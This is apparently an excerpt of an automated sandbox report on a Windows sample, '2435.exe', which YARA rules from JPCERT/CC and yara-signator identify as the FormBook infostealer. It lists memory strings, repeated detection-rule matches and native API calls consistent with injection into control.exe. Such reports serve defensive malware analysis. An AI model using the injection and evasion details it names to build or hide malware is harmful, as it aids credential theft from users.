Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\2435.exe; Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00419D60 NtCreateFile,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00419E10 NtReadFile,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00419E90 NtClose,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00419D5A NtCreateFile,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00419E0A NtReadFile,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00419E8A NtClose,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00419F3A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00ABB040 NtSuspendThread,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9A10 NtQuerySection,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00ABA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00ABAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9560 NtWriteFile,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB96D0 NtCreateKey,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00ABA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9760 NtOpenProcess,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00AB9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\2435.exe; Code function: 1_2_00ABA770 NtOpenThread,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E90 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E8A NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E0A NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9D5A NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\2435.exe | Code function: String function: 00A7B150 appears 133 times
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 0473B150 appears 90 times
          Source: 2435.exe, 00000000.00000003.228583086.0000000009C7F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288731755.0000000000CFF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288265327.00000000007E1000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs 2435.exe
          Source: 2435.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
